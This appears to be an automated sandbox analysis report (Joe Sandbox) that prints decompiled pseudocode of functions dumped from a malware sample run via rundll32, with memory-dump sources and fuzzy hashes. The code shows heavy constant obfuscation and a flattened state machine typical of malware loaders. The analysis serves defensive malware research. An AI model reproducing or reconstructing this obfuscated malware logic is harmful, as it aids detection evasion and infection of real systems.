                                                                                                                    				_v28 = _v28 + 0xffff2701;
                                                                                                                    				_v28 = _v28 + 0x8bbf;
                                                                                                                    				_v28 = _v28 ^ 0x00055e2c;
                                                                                                                    				_v16 = 0xf95115;
                                                                                                                    				_v16 = _v16 | 0x79ce56df;
                                                                                                                    				_v16 = _v16 + 0xffff5817;
                                                                                                                    				_v16 = _v16 ^ 0x79f40a5c;
                                                                                                                    				_v36 = 0x520750;
                                                                                                                    				_v36 = _v36 << 7;
                                                                                                                    				_v36 = _v36 ^ 0x4f263ebd;
                                                                                                                    				_v36 = _v36 * 6;
                                                                                                                    				_v36 = _v36 ^ 0x64ef8369;
                                                                                                                    				_t124 = 0;
                                                                                                                    				_v40 = 0xccfebc;
                                                                                                                    				_t125 = 0x2aa38ff;
                                                                                                                    				_v40 = _v40 + 0xbaf7;
                                                                                                                    				_t118 = 0xd;
                                                                                                                    				_v40 = _v40 * 0x5e;
                                                                                                                    				_v40 = _v40 + 0x6a66;
                                                                                                                    				_v40 = _v40 ^ 0x4b80704d;
                                                                                                                    				_v20 = 0xba2b89;
                                                                                                                    				_v20 = _v20 + 0xa093;
                                                                                                                    				_v20 = _v20 / _t118;
                                                                                                                    				_v20 = _v20 ^ 0x000a03fd;
                                                                                                                    				_v32 = 0xb0f3b0;
                                                                                                                    				_v32 = _v32 + 0x50dc;
                                                                                                                    				_v32 = _v32 + 0xffff1629;
                                                                                                                    				_v32 = _v32 * 0x4e;
                                                                                                                    				_v32 = _v32 ^ 0x35b73aee;
                                                                                                                    				_v4 = 0x432383;
                                                                                                                    				_v4 = _v4 + 0xffff373f;
                                                                                                                    				_v4 = _v4 | 0x7532efd9;
                                                                                                                    				_v4 = _v4 ^ 0x75785e39;
                                                                                                                    				_v8 = 0x709bec;
                                                                                                                    				_v8 = _v8 + 0xffffb2bc;
                                                                                                                    				_v8 = _v8 + 0xffff08e7;
                                                                                                                    				_v8 = _v8 ^ 0x006dec69;
                                                                                                                    				_v12 = 0xe79dac;
                                                                                                                    				_v12 = _v12 * 0x78;
                                                                                                                    				_v12 = _v12 + 0xb337;
                                                                                                                    				_v12 = _v12 ^ 0x6c9daebe;
                                                                                                                    				do {
                                                                                                                    					while(_t125 != 0x2aa38ff) {
                                                                                                                    						if(_t125 == 0x81ec960) {
                                                                                                                    							_t124 = _t124 + E0034C2F8(_v32, _t116 + 0x38, _v4, _v8, _v12);
                                                                                                                    						} else {
                                                                                                                    							if(_t125 == 0xa7224d4) {
                                                                                                                    								_t118 = _v16;
                                                                                                                    								_t111 = E0034C2F8(_t118, _t116 + 0x14, _v36, _v40, _v20);
                                                                                                                    								_t127 =  &(_t127[3]);
                                                                                                                    								_t125 = 0x81ec960;
                                                                                                                    								_t124 = _t124 + _t111;
                                                                                                                    								continue;
                                                                                                                    							} else {
                                                                                                                    								if(_t125 != 0xcb4deb0) {
                                                                                                                    									goto L8;
                                                                                                                    								} else {
                                                                                                                    									_push(_t118);
                                                                                                                    									_push(_t118);
                                                                                                                    									_t115 = E0033474B();
                                                                                                                    									_t127 =  &(_t127[2]);
                                                                                                                    									_t125 = 0xa7224d4;
                                                                                                                    									_t124 = _t124 + _t115;
                                                                                                                    									continue;
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						L11:
                                                                                                                    						return _t124;
                                                                                                                    					}
                                                                                                                    					_t125 = 0xcb4deb0;
                                                                                                                    					L8:
                                                                                                                    				} while (_t125 != 0x4501b46);
                                                                                                                    				goto L11;
                                                                                                                    			}






















                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 9^xu$fj$im
                                                                                                                    • API String ID: 0-3261451082
                                                                                                                    • Opcode ID: 18b3828217514bbcca6388c8ecba237d954a44b53edf24ff878c84fc7e148a74
                                                                                                                    • Instruction ID: 5310b4e0a61d05d562fb7f2b1ec9f4a1de3616684536bbaa9c3967df91f2af6d
                                                                                                                    • Opcode Fuzzy Hash: 18b3828217514bbcca6388c8ecba237d954a44b53edf24ff878c84fc7e148a74
                                                                                                                    • Instruction Fuzzy Hash: 205148B24083429BC788CF25D58980BBBE0BFD8368F511A1DF8D566260D3B5DA49CF87
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 82%
                                                                                                                    			E00339B83(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                    				unsigned int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				signed int _v16;
                                                                                                                    				signed int _v20;
                                                                                                                    				signed int _v24;
                                                                                                                    				signed int _v28;
                                                                                                                    				signed int _v32;
                                                                                                                    				signed int _v36;
                                                                                                                    				signed int _v40;
                                                                                                                    				signed int _v44;
                                                                                                                    				signed int _v48;
                                                                                                                    				char _v52;
                                                                                                                    				void* _v64;
                                                                                                                    				intOrPtr _v68;
                                                                                                                    				void* _t115;
                                                                                                                    				signed int _t130;
                                                                                                                    				signed int _t131;
                                                                                                                    				void* _t133;
                                                                                                                    
                                                                                                                    				_push(_a16);
                                                                                                                    				_push(_a12);
                                                                                                                    				_v52 = 0x104;
                                                                                                                    				_push(_a8);
                                                                                                                    				_push(_a4);
                                                                                                                    				_push(0x104);
                                                                                                                    				_push(__ecx);
                                                                                                                    				E003420B9(0x104);
                                                                                                                    				_v68 = 0x342964;
                                                                                                                    				asm("stosd");
                                                                                                                    				_t133 = 0;
                                                                                                                    				asm("stosd");
                                                                                                                    				asm("stosd");
                                                                                                                    				_v40 = 0xa3a3c;
                                                                                                                    				_v40 = _v40 + 0x2c25;
                                                                                                                    				_v40 = _v40 ^ 0x000a7661;
                                                                                                                    				_v16 = 0x75ee44;
                                                                                                                    				_t130 = 0x7a;
                                                                                                                    				_v16 = _v16 / _t130;
                                                                                                                    				_v16 = _v16 ^ 0xc9e42672;
                                                                                                                    				_v16 = _v16 ^ 0xc9e58a7e;
                                                                                                                    				_v8 = 0x386b92;
                                                                                                                    				_v8 = _v8 << 4;
                                                                                                                    				_v8 = _v8 | 0x0ec9a536;
                                                                                                                    				_v8 = _v8 >> 0xf;
                                                                                                                    				_v8 = _v8 ^ 0x000b4478;
                                                                                                                    				_v44 = 0xd66787;
                                                                                                                    				_v44 = _v44 >> 3;
                                                                                                                    				_v44 = _v44 ^ 0x001d593f;
                                                                                                                    				_v24 = 0x7c5a73;
                                                                                                                    				_v24 = _v24 | 0xae316990;
                                                                                                                    				_t131 = 0x19;
                                                                                                                    				_v24 = _v24 / _t131;
                                                                                                                    				_v24 = _v24 ^ 0x06f0967a;
                                                                                                                    				_v20 = 0x3dfd52;
                                                                                                                    				_v20 = _v20 >> 8;
                                                                                                                    				_v20 = _v20 * 0x24;
                                                                                                                    				_v20 = _v20 ^ 0x0009affd;
                                                                                                                    				_v12 = 0xf0c6a5;
                                                                                                                    				_v12 = _v12 + 0xffff2be4;
                                                                                                                    				_v12 = _v12 + 0x1686;
                                                                                                                    				_v12 = _v12 << 2;
                                                                                                                    				_v12 = _v12 ^ 0x03c3840c;
                                                                                                                    				_v48 = 0x30c967;
                                                                                                                    				_v48 = _v48 | 0xcae095b2;
                                                                                                                    				_v48 = _v48 ^ 0xcaf7f966;
                                                                                                                    				_v36 = 0xabcbdc;
                                                                                                                    				_v36 = _v36 + 0xfffff856;
                                                                                                                    				_v36 = _v36 | 0xb2b71321;
                                                                                                                    				_v36 = _v36 ^ 0xb2b3c312;
                                                                                                                    				_v32 = 0xda8dbe;
                                                                                                                    				_v32 = _v32 + 0xffff364b;
                                                                                                                    				_v32 = _v32 | 0x02598b37;
                                                                                                                    				_v32 = _v32 ^ 0x02d31c0a;
                                                                                                                    				_v28 = 0x528ee8;
                                                                                                                    				_v28 = _v28 * 0x12;
                                                                                                                    				_v28 = _v28 << 2;
                                                                                                                    				_v28 = _v28 ^ 0x17383776;
                                                                                                                    				_t115 = E003391DD(__ecx, _v40, __ecx);
                                                                                                                    				_t132 = _t115;
                                                                                                                    				if(_t115 != 0) {
                                                                                                                    					_t133 = E003376AA(_a12,  &_v52, _v44, _v24, __ecx, _v20, _t132, _v12);
                                                                                                                    					E00341E67(_v48, _v36, _v32, _v28, _t132);
                                                                                                                    				}
                                                                                                                    				return _t133;
                                                                                                                    			}


                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Du$av$sZ|
                                                                                                                    • API String ID: 0-3795359321
                                                                                                                    • Opcode ID: dfc967cf0c468e8d72dd3f4d8ef6424ad64969c011c2b846f478a6ab0dae1b6b
                                                                                                                    • Instruction ID: 87e0833b519ce751f2d62f896d5bbecb2ecb7d8b72f303f924b84b530b236b18
                                                                                                                    • Opcode Fuzzy Hash: dfc967cf0c468e8d72dd3f4d8ef6424ad64969c011c2b846f478a6ab0dae1b6b
                                                                                                                    • Instruction Fuzzy Hash: 215114B1D00209EBDF09DFE5C94A8EEBBB1FB48318F108159E411B6260D3755A54DFA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 90%
                                                                                                                    			E00346C49(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                    				signed int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				signed int _v16;
                                                                                                                    				signed int _v20;
                                                                                                                    				signed int _v24;
                                                                                                                    				signed int _v28;
                                                                                                                    				signed int _v32;
                                                                                                                    				signed int _v36;
                                                                                                                    				signed int _v40;
                                                                                                                    				signed int _v44;
                                                                                                                    				signed int _v48;
                                                                                                                    				signed int _v52;
                                                                                                                    				intOrPtr _v56;
                                                                                                                    				char _v88;
                                                                                                                    				char _v608;
                                                                                                                    				void* _t92;
                                                                                                                    				void* _t96;
                                                                                                                    				void* _t101;
                                                                                                                    				void* _t112;
                                                                                                                    				void* _t113;
                                                                                                                    
                                                                                                                    				_push(_a12);
                                                                                                                    				_push(_a8);
                                                                                                                    				_push(_a4);
                                                                                                                    				_push(__edx);
                                                                                                                    				_push(__ecx);
                                                                                                                    				E003420B9(_t92);
                                                                                                                    				_v52 = _v52 & 0x00000000;
                                                                                                                    				_v56 = 0x878462;
                                                                                                                    				_t113 = _t112 + 0x14;
                                                                                                                    				_v32 = 0x956791;
                                                                                                                    				_t101 = 0x1300659;
                                                                                                                    				_v32 = _v32 + 0xffff68af;
                                                                                                                    				_v32 = _v32 ^ 0x0094d050;
                                                                                                                    				_v48 = 0xb6c679;
                                                                                                                    				_v48 = _v48 * 9;
                                                                                                                    				_v48 = _v48 ^ 0x0662f925;
                                                                                                                    				_v16 = 0xd9c762;
                                                                                                                    				_v16 = _v16 << 1;
                                                                                                                    				_v16 = _v16 | 0xb4c78449;
                                                                                                                    				_v16 = _v16 ^ 0xb5f30401;
                                                                                                                    				_v40 = 0x8b331e;
                                                                                                                    				_v40 = _v40 >> 0xc;
                                                                                                                    				_v40 = _v40 ^ 0x000c5129;
                                                                                                                    				_v28 = 0x1269f4;
                                                                                                                    				_v28 = _v28 >> 4;
                                                                                                                    				_v28 = _v28 ^ 0x0007e996;
                                                                                                                    				_v44 = 0xabd705;
                                                                                                                    				_v44 = _v44 ^ 0x9c90d177;
                                                                                                                    				_v44 = _v44 ^ 0x9c3fe788;
                                                                                                                    				_v8 = 0x357d72;
                                                                                                                    				_v8 = _v8 + 0xd90c;
                                                                                                                    				_v8 = _v8 ^ 0xccfdbdcb;
                                                                                                                    				_v8 = _v8 >> 3;
                                                                                                                    				_v8 = _v8 ^ 0x199e890f;
                                                                                                                    				_v12 = 0x32e6;
                                                                                                                    				_v12 = _v12 ^ 0x74a35607;
                                                                                                                    				_v12 = _v12 | 0x704b9008;
                                                                                                                    				_v12 = _v12 + 0xffff83aa;
                                                                                                                    				_v12 = _v12 ^ 0x74eee325;
                                                                                                                    				_v36 = 0xeddfb6;
                                                                                                                    				_v36 = _v36 << 0xa;
                                                                                                                    				_v36 = _v36 ^ 0xb77b8cf2;
                                                                                                                    				_v24 = 0xe2b758;
                                                                                                                    				_v24 = _v24 << 5;
                                                                                                                    				_v24 = _v24 * 0x38;
                                                                                                                    				_v24 = _v24 ^ 0x330719f5;
                                                                                                                    				_v20 = 0x9236d6;
                                                                                                                    				_v20 = _v20 | 0x3f0523f5;
                                                                                                                    				_v20 = _v20 >> 0xd;
                                                                                                                    				_v20 = _v20 ^ 0x000835ca;
                                                                                                                    				do {
                                                                                                                    					while(_t101 != 0x1300659) {
                                                                                                                    						if(_t101 == 0xa264c44) {
                                                                                                                    							_t96 = E00339D31(_v40,  &_v608, _v28, _t101, _v44, _v8);
                                                                                                                    							_t113 = _t113 + 0x10;
                                                                                                                    							_t101 = 0xbcabc0e;
                                                                                                                    							continue;
                                                                                                                    						}
                                                                                                                    						if(_t101 != 0xbcabc0e) {
                                                                                                                    							goto L8;
                                                                                                                    						}
                                                                                                                    						return E00346637( &_v88, _v12, _v36, _v24,  &_v608, _a12, _v20);
                                                                                                                    					}
                                                                                                                    					_t96 = E00334B61( &_v88, _v32, _v48, _v16);
                                                                                                                    					_t101 = 0xa264c44;
                                                                                                                    					L8:
                                                                                                                    				} while (_t101 != 0x478adce);
                                                                                                                    				return _t96;
                                                                                                                    			}
























                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: %t$DL&$r}5
                                                                                                                    • API String ID: 0-2337153543
                                                                                                                    • Opcode ID: 7dbbebab4da4aa2abdde95fd686c9ed2a692aafdb7a56fb7eb10c47b438e4e0c
                                                                                                                    • Instruction ID: 5ea5d47ecee30431de6b9de4353c37f9d761ffcbf4e4b4b42d965be9d5a76b6f
                                                                                                                    • Opcode Fuzzy Hash: 7dbbebab4da4aa2abdde95fd686c9ed2a692aafdb7a56fb7eb10c47b438e4e0c
                                                                                                                    • Instruction Fuzzy Hash: FD412371D0020EEBCF0ADFE1D94A4EEBBB1FB49318F208098D5117A260D3B55A59CFA5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • __decode_pointer.LIBCMT ref: 1003B8CA
                                                                                                                      • Part of subcall function 100350AE: TlsGetValue.KERNEL32 ref: 100350BB
                                                                                                                      • Part of subcall function 100350AE: TlsGetValue.KERNEL32 ref: 100350D2
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32 ref: 1003B8D1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Value$ExceptionFilterUnhandled__decode_pointer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1958600898-0
                                                                                                                    • Opcode ID: 5a11b17b52fb02af9bc6982e0ec44a7269600518a9b7aa9640256876448a332b
                                                                                                                    • Instruction ID: 13914855b6ed5f75d6cf868945e622cc1528c9e1cf50f9ea13f0b817109926cd
                                                                                                                    • Opcode Fuzzy Hash: 5a11b17b52fb02af9bc6982e0ec44a7269600518a9b7aa9640256876448a332b
                                                                                                                    • Instruction Fuzzy Hash: 7FC08C388087C04FEB1AD3354D8C30D3E00E713301FC00488DC80D5053EE99410C8323
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 96%
                                                                                                                    			E003495FA() {
                                                                                                                    				char _v524;
                                                                                                                    				signed int _v532;
                                                                                                                    				intOrPtr _v536;
                                                                                                                    				intOrPtr _v540;
                                                                                                                    				intOrPtr _v544;
                                                                                                                    				intOrPtr _v548;
                                                                                                                    				intOrPtr _v552;
                                                                                                                    				intOrPtr _v556;
                                                                                                                    				intOrPtr _v560;
                                                                                                                    				char _v564;
                                                                                                                    				intOrPtr _v568;
                                                                                                                    				char _v572;
                                                                                                                    				signed int _v576;
                                                                                                                    				signed int _v580;
                                                                                                                    				signed int _v584;
                                                                                                                    				signed int _v588;
                                                                                                                    				signed int _v592;
                                                                                                                    				signed int _v596;
                                                                                                                    				signed int _v600;
                                                                                                                    				signed int _v604;
                                                                                                                    				signed int _v608;
                                                                                                                    				signed int _v612;
                                                                                                                    				signed int _v616;
                                                                                                                    				signed int _v620;
                                                                                                                    				signed int _v624;
                                                                                                                    				signed int _v628;
                                                                                                                    				signed int _v632;
                                                                                                                    				signed int _v636;
                                                                                                                    				signed int _v640;
                                                                                                                    				signed int _v644;
                                                                                                                    				signed int _v648;
                                                                                                                    				signed int _v652;
                                                                                                                    				signed int _v656;
                                                                                                                    				signed int _v660;
                                                                                                                    				signed int _v664;
                                                                                                                    				signed int _v668;
                                                                                                                    				signed int _v672;
                                                                                                                    				signed int _v676;
                                                                                                                    				signed int _v680;
                                                                                                                    				signed int _v684;
                                                                                                                    				signed int _v688;
                                                                                                                    				intOrPtr _t295;
                                                                                                                    				void* _t297;
                                                                                                                    				void* _t298;
                                                                                                                    				intOrPtr _t299;
                                                                                                                    				signed int _t306;
                                                                                                                    				void* _t309;
                                                                                                                    				void* _t310;
                                                                                                                    				char _t311;
                                                                                                                    				void* _t317;
                                                                                                                    				intOrPtr _t334;
                                                                                                                    				signed int _t341;
                                                                                                                    				signed int _t342;
                                                                                                                    				signed int _t343;
                                                                                                                    				signed int _t344;
                                                                                                                    				void* _t347;
                                                                                                                    
                                                                                                                    				_v668 = 0xe6fb93;
                                                                                                                    				_v668 = _v668 + 0xffff1eed;
                                                                                                                    				_t310 = 0xada6804;
                                                                                                                    				_v668 = _v668 * 0x61;
                                                                                                                    				_t309 = 0;
                                                                                                                    				_v668 = _v668 ^ 0xaca28cc6;
                                                                                                                    				_v668 = _v668 ^ 0xfb928647;
                                                                                                                    				_v616 = 0x8caf33;
                                                                                                                    				_t341 = 0x42;
                                                                                                                    				_v616 = _v616 * 0x25;
                                                                                                                    				_v616 = _v616 * 0x4f;
                                                                                                                    				_v616 = _v616 ^ 0x46546a51;
                                                                                                                    				_v620 = 0x861136;
                                                                                                                    				_v620 = _v620 | 0x52f06d4d;
                                                                                                                    				_v620 = _v620 >> 0xf;
                                                                                                                    				_v620 = _v620 ^ 0x0000a5ef;
                                                                                                                    				_v628 = 0x4cf396;
                                                                                                                    				_v628 = _v628 >> 1;
                                                                                                                    				_v628 = _v628 >> 9;
                                                                                                                    				_v628 = _v628 ^ 0x0000133c;
                                                                                                                    				_v684 = 0xc54e58;
                                                                                                                    				_v684 = _v684 >> 2;
                                                                                                                    				_v684 = _v684 ^ 0xb8bf25ee;
                                                                                                                    				_v684 = _v684 >> 2;
                                                                                                                    				_v684 = _v684 ^ 0x2e259ad3;
                                                                                                                    				_v592 = 0x68267f;
                                                                                                                    				_v592 = _v592 + 0xffff39c4;
                                                                                                                    				_v592 = _v592 ^ 0x006c60f9;
                                                                                                                    				_v632 = 0xa1d089;
                                                                                                                    				_v632 = _v632 / _t341;
                                                                                                                    				_v632 = _v632 ^ 0x52222b14;
                                                                                                                    				_v632 = _v632 ^ 0x5220bcfc;
                                                                                                                    				_v608 = 0x39d352;
                                                                                                                    				_v608 = _v608 | 0x2e7e1ae1;
                                                                                                                    				_v608 = _v608 ^ 0x576cc274;
                                                                                                                    				_v608 = _v608 ^ 0x7911cf35;
                                                                                                                    				_v660 = 0xc26f36;
                                                                                                                    				_v660 = _v660 ^ 0x9f5dc88a;
                                                                                                                    				_v660 = _v660 ^ 0xeefda613;
                                                                                                                    				_t342 = 0x3f;
                                                                                                                    				_v660 = _v660 / _t342;
                                                                                                                    				_v660 = _v660 ^ 0x01ce77bb;
                                                                                                                    				_v624 = 0x334861;
                                                                                                                    				_v624 = _v624 + 0xffff4b1a;
                                                                                                                    				_t343 = 0x2a;
                                                                                                                    				_v624 = _v624 * 0x2f;
                                                                                                                    				_v624 = _v624 ^ 0x0947e580;
                                                                                                                    				_v652 = 0xab72b9;
                                                                                                                    				_v652 = _v652 << 8;
                                                                                                                    				_v652 = _v652 / _t343;
                                                                                                                    				_v652 = _v652 ^ 0x0419701b;
                                                                                                                    				_v688 = 0x507748;
                                                                                                                    				_v688 = _v688 << 5;
                                                                                                                    				_v688 = _v688 + 0xffff449a;
                                                                                                                    				_v688 = _v688 + 0xb858;
                                                                                                                    				_v688 = _v688 ^ 0x0a0a66f0;
                                                                                                                    				_v600 = 0x95cabc;
                                                                                                                    				_v600 = _v600 + 0xffffb185;
                                                                                                                    				_v600 = _v600 << 9;
                                                                                                                    				_v600 = _v600 ^ 0x2af43595;
                                                                                                                    				_v580 = 0x7e3ec7;
                                                                                                                    				_v580 = _v580 ^ 0x09caac24;
                                                                                                                    				_v580 = _v580 ^ 0x09b70662;
                                                                                                                    				_v612 = 0xa526a8;
                                                                                                                    				_v612 = _v612 | 0x64dab874;
                                                                                                                    				_v612 = _v612 >> 0xe;
                                                                                                                    				_v612 = _v612 ^ 0x0006f9eb;
                                                                                                                    				_v604 = 0xb7de18;
                                                                                                                    				_t344 = 0x48;
                                                                                                                    				_v604 = _v604 * 0x79;
                                                                                                                    				_v604 = _v604 * 0x31;
                                                                                                                    				_v604 = _v604 ^ 0xa26ee4e9;
                                                                                                                    				_v640 = 0x553c00;
                                                                                                                    				_v640 = _v640 + 0xffff4196;
                                                                                                                    				_v640 = _v640 + 0xffff8daf;
                                                                                                                    				_v640 = _v640 ^ 0x00577a07;
                                                                                                                    				_v576 = 0xaac37;
                                                                                                                    				_v576 = _v576 * 0x77;
                                                                                                                    				_v576 = _v576 ^ 0x04fc3a71;
                                                                                                                    				_v676 = 0xb6ce7b;
                                                                                                                    				_v676 = _v676 >> 1;
                                                                                                                    				_v676 = _v676 * 0x28;
                                                                                                                    				_v676 = _v676 >> 0xb;
                                                                                                                    				_v676 = _v676 ^ 0x000b20b4;
                                                                                                                    				_v584 = 0x4877b4;
                                                                                                                    				_v584 = _v584 << 1;
                                                                                                                    				_v584 = _v584 ^ 0x009148e9;
                                                                                                                    				_v588 = 0xaf1c90;
                                                                                                                    				_v588 = _v588 * 0x5b;
                                                                                                                    				_v588 = _v588 ^ 0x3e3937c6;
                                                                                                                    				_v644 = 0x150bb3;
                                                                                                                    				_v644 = _v644 + 0x865c;
                                                                                                                    				_v644 = _v644 + 0x5404;
                                                                                                                    				_v644 = _v644 ^ 0x001dce65;
                                                                                                                    				_v648 = 0xaa3958;
                                                                                                                    				_v648 = _v648 / _t344;
                                                                                                                    				_v648 = _v648 >> 0xe;
                                                                                                                    				_v648 = _v648 ^ 0x000a9525;
                                                                                                                    				_v596 = 0xdb2add;
                                                                                                                    				_v596 = _v596 << 0xd;
                                                                                                                    				_v596 = _v596 ^ 0x65528fd4;
                                                                                                                    				_v680 = 0xd04d0c;
                                                                                                                    				_v680 = _v680 << 5;
                                                                                                                    				_t340 = _v596;
                                                                                                                    				_v680 = _v680 * 0x55;
                                                                                                                    				_v680 = _v680 | 0x96843ebb;
                                                                                                                    				_v680 = _v680 ^ 0xb7be4a39;
                                                                                                                    				_v656 = 0x2591b4;
                                                                                                                    				_v656 = _v656 ^ 0x7517a4f1;
                                                                                                                    				_v656 = _v656 ^ 0xb20365ef;
                                                                                                                    				_v656 = _v656 + 0xffff4c4f;
                                                                                                                    				_v656 = _v656 ^ 0xc733773b;
                                                                                                                    				_v636 = 0xbfc674;
                                                                                                                    				_v636 = _v636 * 0x1d;
                                                                                                                    				_v636 = _v636 << 6;
                                                                                                                    				_v636 = _v636 ^ 0x6e5b8cbc;
                                                                                                                    				_v664 = 0x3235cc;
                                                                                                                    				_v664 = _v664 << 1;
                                                                                                                    				_v664 = _v664 | 0x857b9d7f;
                                                                                                                    				_v664 = _v664 * 0x28;
                                                                                                                    				_v664 = _v664 ^ 0xdbf98c50;
                                                                                                                    				_v672 = 0xb181ad;
                                                                                                                    				_v672 = _v672 >> 0xa;
                                                                                                                    				_v672 = _v672 << 2;
                                                                                                                    				_v672 = _v672 ^ 0xdb7e6d02;
                                                                                                                    				_v672 = _v672 ^ 0xdb78e9e9;
                                                                                                                    				do {
                                                                                                                    					while(_t310 != 0x10c1a7f) {
                                                                                                                    						if(_t310 == 0x31db0c0) {
                                                                                                                    							_t311 = _v572;
                                                                                                                    							_t295 = _v568;
                                                                                                                    							_push(_t311);
                                                                                                                    							_v560 = _t295;
                                                                                                                    							_v552 = _t295;
                                                                                                                    							_v544 = _t295;
                                                                                                                    							_v536 = _t295;
                                                                                                                    							_v564 = _t311;
                                                                                                                    							_v556 = _t311;
                                                                                                                    							_v548 = _t311;
                                                                                                                    							_v540 = _t311;
                                                                                                                    							_v532 = _v628;
                                                                                                                    							_t297 = E00335DDD( &_v564, _t340, _v644, _v648, _t311, _v596, _v680);
                                                                                                                    							_t347 = _t347 + 0x18;
                                                                                                                    							__eflags = _t297;
                                                                                                                    							_t309 =  !=  ? 1 : _t309;
                                                                                                                    							_t310 = 0x48f7cbb;
                                                                                                                    							continue;
                                                                                                                    						} else {
                                                                                                                    							if(_t310 == 0x461819e) {
                                                                                                                    								_push(_v660);
                                                                                                                    								_push(_v608);
                                                                                                                    								_t298 = E0034DCF7(_v632, 0x331000, __eflags);
                                                                                                                    								_pop(_t317);
                                                                                                                    								_t299 =  *0x353e10; // 0x0
                                                                                                                    								_t334 =  *0x353e10; // 0x0
                                                                                                                    								E003347CE(_t334 + 0x23c, _v624, _t317, _v652, _v688, _t298, _t299 + 0x1c, _v600, _v580);
                                                                                                                    								E0033A8B0(_v612, _t298, _v604);
                                                                                                                    								_t347 = _t347 + 0x24;
                                                                                                                    								_t310 = 0xa22489e;
                                                                                                                    								continue;
                                                                                                                    							} else {
                                                                                                                    								if(_t310 == 0x48f7cbb) {
                                                                                                                    									E00341E67(_v656, _v636, _v664, _v672, _t340);
                                                                                                                    								} else {
                                                                                                                    									if(_t310 == 0xa22489e) {
                                                                                                                    										_t306 = E00338F65(_v640, _v576,  &_v524, _v676, 0, _t310, _v616, _v584, _v620, _v588, _t310, _v668);
                                                                                                                    										_t340 = _t306;
                                                                                                                    										_t347 = _t347 + 0x28;
                                                                                                                    										__eflags = _t306 - 0xffffffff;
                                                                                                                    										if(__eflags != 0) {
                                                                                                                    											_t310 = 0x31db0c0;
                                                                                                                    											continue;
                                                                                                                    										}
                                                                                                                    									} else {
                                                                                                                    										if(_t310 == 0xada6804) {
                                                                                                                    											_t310 = 0xcbcd90e;
                                                                                                                    											continue;
                                                                                                                    										} else {
                                                                                                                    											if(_t310 != 0xcbcd90e) {
                                                                                                                    												goto L15;
                                                                                                                    											} else {
                                                                                                                    												E0034C1EC(_v684, _v592,  &_v572);
                                                                                                                    												_t310 = 0x10c1a7f;
                                                                                                                    												continue;
                                                                                                                    											}
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						L18:
                                                                                                                    						return _t309;
                                                                                                                    					}
                                                                                                                    					_v572 = _v572 - E0034ABD1();
                                                                                                                    					_t310 = 0x461819e;
                                                                                                                    					asm("sbb [esp+0x8c], edx");
                                                                                                                    					L15:
                                                                                                                    					__eflags = _t310 - 0x7e6efe8;
                                                                                                                    				} while (__eflags != 0);
                                                                                                                    				goto L18;
                                                                                                                    			}
                                                                                                                    0x003498c1
                                                                                                                    0x003498c9
                                                                                                                    0x003498d1
                                                                                                                    0x003498d9
                                                                                                                    0x003498e1
                                                                                                                    0x003498ef
                                                                                                                    0x003498f3
